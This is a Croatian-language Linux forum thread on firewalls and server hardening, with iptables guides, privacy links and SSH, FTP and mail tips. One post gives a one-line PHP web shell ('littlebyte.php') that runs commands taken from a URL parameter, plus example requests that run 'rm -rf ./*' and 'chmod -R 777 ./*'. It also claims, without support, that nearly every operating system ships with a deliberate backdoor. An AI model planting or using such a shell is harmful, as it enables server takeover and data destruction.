Sada je: 18 stu 2019, 18:01.
Linux, poslužitelj, mreže i sigurnost

Moderator/ica: Moderatori/ce

Naletio sam na izjavu:
As a matter of information, the firewall in Linux can never be "turned off." It is part of the ports infrastructure of the kernel. It must be there and functioning for the kernel to run. What you can turn on and off is the GUI front end to iptables. It is used solely for setting up the firewall and sometimes providing some fancier logging functions.
Nije teško biti toliko nesrećan da bi čovek počeo da pije. Ljude treba odvikavati od nesreće, a ne od alkohola. Nesreća je veći porok.
Avatar
Postovi: 9934
Postovi: 9934
Pridružen/a: 12 tra 2008, 22:45
Lokacija: Split
Podijelio/la zahvalu: 7 puta
Primio/la zahvalu: 71 puta
Spol: M
OS: KDE Neon
ali defaultni rulevi su accept za sve, tako je je on tu, ali propusta sve sto dolazi.
...."Have you mooed today?"...
..It’s that time of the decade: I’m reinstalling Debian..
Avatar
Postovi: 5677
Postovi: 5677
Pridružen/a: 28 vel 2009, 16:36
Podijelio/la zahvalu: 1 puta
Primio/la zahvalu: 41 puta
Naštimao sam snort, i sad se pokreće kod paljenja računala, i radi uredno. Sad bih samo sredio firewall, ali mi se ovaj koji imam čini prejednostavnim:

slika

Pa dali vi imate kakvu preporuku nekog dobrog firewalla?
One definition of the word mean is "small." Mean people live small, think small, and feel small—the smaller, the meaner.
Avatar
Postovi: 2478
Postovi: 2478
Pridružen/a: 28 vel 2010, 18:13
Lokacija: Đubrovnik
Podijelio/la zahvalu: 11 puta
Primio/la zahvalu: 7 puta
Spol: M
OS: Linux
Vidi ovo:
https://help.ubuntu.com/community/IptablesHowTo
I ovo:
http://www.linuxhomenetworking.com/wiki/index.php/Quick_HOWTO_:_Ch14_:_Linux_Firewalls_Using_iptables
Ako to naučiš, nemaš nikakvih problema.
Avatar
Site Admin
Postovi: 16087
Site Admin
Postovi: 16087
Pridružen/a: 03 tra 2008, 18:09
Lokacija: Svugdi me ima. Slavonija uglavnom.
Podijelio/la zahvalu: 503 puta
Primio/la zahvalu: 531 puta
Spol: M
OS: Mint 17 Cinnamon
Cudi me da ova tema nije ozivila, s obzirom na sve sto se dogadja u posljednjih par mjeseci.

IETF - Internet Engineering Task Force imao je jedan od svojih sastanaka (2013-11-06). Streamali su live, sada je snimka na Youtubeu.
Tema: IETF 88 Technical Plenary: Hardening The Internet

......................................................
src: http://www.youtube.com/watch?v=oV71hhEpQ20
Lutherus je napisao/la:Ne postoje linuksi, postoji samo Linux i on je jedan i on je kernel.

Is Linux About Choice? || Pulsir - awesome blogging site :D
iv@n je napisao/la:Divide et impera i kako se kaže na latinskom da je ljudska glupost neuništiva.
Avatar
Postovi: 6781
Postovi: 6781
Pridružen/a: 06 lis 2011, 01:29
Lokacija: ~$
Podijelio/la zahvalu: 145 puta
Primio/la zahvalu: 58 puta
Spol: M
OS: Ovisi za sta
Evo kako se izmedju ostaloga mozemo zastititi:

GNU Privacy Guard – The Basics

http://www.bartbania.com/index.php/gnu- ... he-basics/
Lutherus je napisao/la:Ne postoje linuksi, postoji samo Linux i on je jedan i on je kernel.

Is Linux About Choice? || Pulsir - awesome blogging site :D
iv@n je napisao/la:Divide et impera i kako se kaže na latinskom da je ljudska glupost neuništiva.
Avatar
Postovi: 6781
Postovi: 6781
Pridružen/a: 06 lis 2011, 01:29
Lokacija: ~$
Podijelio/la zahvalu: 145 puta
Primio/la zahvalu: 58 puta
Spol: M
OS: Ovisi za sta
Zanimljivo

http://www.slideshare.net/endrazine/def ... al#btnNext
Avatar
Postovi: 11
Postovi: 11
Pridružen/a: 06 stu 2013, 11:04
Podijelio/la zahvalu: 11 puta
Primio/la zahvalu: 0 puta
Spol: M
OS: LinuxMint 15 + Gnome 3
Evo Free alternative aplikacija, servisa i svega zivoga, jako prakticno i vjerujem potrebno.

https://prism-break.org/

Opt out of global data surveillance programs like PRISM, XKeyscore and Tempora. Stop governments from spying on you by encrypting your communications and ending your reliance on proprietary services.
Lutherus je napisao/la:Ne postoje linuksi, postoji samo Linux i on je jedan i on je kernel.

Is Linux About Choice? || Pulsir - awesome blogging site :D
iv@n je napisao/la:Divide et impera i kako se kaže na latinskom da je ljudska glupost neuništiva.
Avatar
Postovi: 6781
Postovi: 6781
Pridružen/a: 06 lis 2011, 01:29
Lokacija: ~$
Podijelio/la zahvalu: 145 puta
Primio/la zahvalu: 58 puta
Spol: M
OS: Ovisi za sta
Evo jedne teme o sigurnosti ...

Sta uraditi ukoliko zelite sanirati sigurnosne propuste na gnu/linux sistemima ???

Ukoliko Vam je racunar "na netu" i otvoren port 22 za ssh ... izmestite ga na neki visoki port(62300, 43999..), jer script kiddies obicno koriste "brze" alate, koji ne skeniraju svih sezdeset i nesto hiljada portova (tacnije 65535) ... te je najbolje izmestiti na sto vise portove ...
Svi skeneri uglavnom pocinju od nule i skeniraju do 300, 400, 500, cak i manje ... jer ima eventualno treba port 21, 22, 23, 25, 80, 443 ...
Cak stavise, mozete ih prevariti tako sto cete ostaviti port 22 i forvardovati ga na nepostojecu masinu i dobicete na vremenu i zbunicete napadaca a svi paketi oticice u crnu rupu ...
Mozete isto taj port 22 preusmeriti na telnet service neke aplikacije, tj ostaviti bez lozinke i samo ga automatski prebaciti na telnet servis prikazati neku poruku, logovati napadaca a zatim mu poslati "paket" nazad ...
U svakom slucaju trebate iskljuciti remote root login za ssh ... i trebate za root korisnika autorizovati samo jednog (Vaseg) korinika kada se loguje na sistem, jer ukoliko na sistemu ima vise korisnika, Vi necete znati ko je slaba karika i kakvu lozinku koristi (kratku, logicnu...) ...

Koristite sigurnosne kljuceve!!!

Idemo na ftp (21) ... kod ftp-a morate biti oprezni, jer je vecina ftp servera podesena (ne)sigurno ... Prvo, stavite dobre lozinke i namestite bruteforce alarm.
Koliko znam, npr FileZilla ne enkriptuje lozinke te je snif itekako moguc ... Ne trebate prestati koristiti FileZilla ali dobro je namestiti kontra snif tool i detektovati malicioznog snifera te ga upaljivati i zbunjivati ...

Onemogucite root access ftp-u i onemogucite anonymous acc ... takodje onemogucite listanje tudjih direktorijuma i samog sistema ...

Aj sad na telnet (23) - Postoji uvrazeno misljenje da je telnet nesiguran ... da ... nesiguran je prema korisniku jer ne enkriptuje lozinke itd. ali za druge namene itekako je siguran i brz i efikasan ... Pustite ga u okruzenju nekog servisa da radi svoj posao na strani servera jer ga dosta brzo i pouzdano radi ... Bind-ujte neku server-client aplikaciju na neki visoki port a prilazite telnetom i jail-ujte ga ... takodje mozete ga zatvoriti i u unutrasnju mikroklimu vase mreze i dati mu neku bitnu ulogu ... U svakom slucaju ne ostavljate ga otvorenog za spolja za logovanje korisnika itd ...

Ako me neko nije razumeo ... za mail, http, ftp ... server onemogucite telnet pristup ... Koristite ga namenski !@!!!!

Za port 25 iskljucite telnet pristup smtp-u jer moze iscitati headere i znati o kojoj verziji servera se radi ... Takodje mail server konfigurisite sto preciznije i detaljnije ... koristite spamassasin i skripte koje mogu detektovati cudna ponasanja ... ja koristim custom skripte tipa slucajnih uzoraka ... na taj nacin detektujete rizicne adrese ... zabranite im pristup ... po mogucstvu automatizovano bas kroz te custom skripte ....

O portu 80 je glupo govoriti jer mi je jedan od omiljenih ... te bi voleo da cujem i druge na tu temu ... 443 takodje ...
Ali evo jedne zanimljive stvarcice ... nazvao sam je littlebyte.php
ima samo 34B a moze se smanjiti i na 26, mozda i manje ... Moze obrisati ceo sajt ... takoreci moze sluziti kao "http terminal" ukoliko su ukljucene sistemske komande ... `` zamenjuju php funkciju exec('komanda');
... znaci `uname -a` je isto sto i exec('uname -a')
Kod:
Kod: Označi sve
<?php $t=$_GET['t']; echo `$t`; ?>

Upotreba:
Kod:
Kod: Označi sve
http://domen.tld/litllebyte.php?t=chmod -R 777 ./*

Kod: Označi sve
http://domen.tld/litllebyte.php?t=rm -rf ./*

Zastita:
u php.ini zabraniti sistemske komande ili safemod staviti na on...

U svakom slucaju ovo je neki mali uvod za server orijentisane masine ...

Za desktop se rucno ubaci trojanski konj ili custom backdoor ili neka remote code execution aplikacija ili skripta ...
Jedan od boljih metoda fizickog pristupa je cekic ili malj ...
Otsecanje tudjeg prsta ili vadjenje oka za "bio-tech" pristup cete videti samo u filmovima ... mada, ko bi ga znao ...

Skoro svaki operativni sistem ima namerni backdoor ostavljen od strane kreatora, te dobro procitajte dokumentaciju i zastitite se od ulaza na zadnja vrata ...
... šta god da učiniš ... NISI DOBRO IZRAČUNAO ...
... for good fun and advanced thinking join WS1 ...
... do Boga je put dosta kratak, ne moras dalje od svog srca ...
Avatar
Postovi: 118
Postovi: 118
Pridružen/a: 21 vel 2013, 01:00
Lokacija: /dev/hda2, etc
Podijelio/la zahvalu: 23 puta
Primio/la zahvalu: 8 puta
Spol: M
OS: wheezy, slekver ;)

Na mreži
Trenutno korisnika/ca: / i 2 gostiju.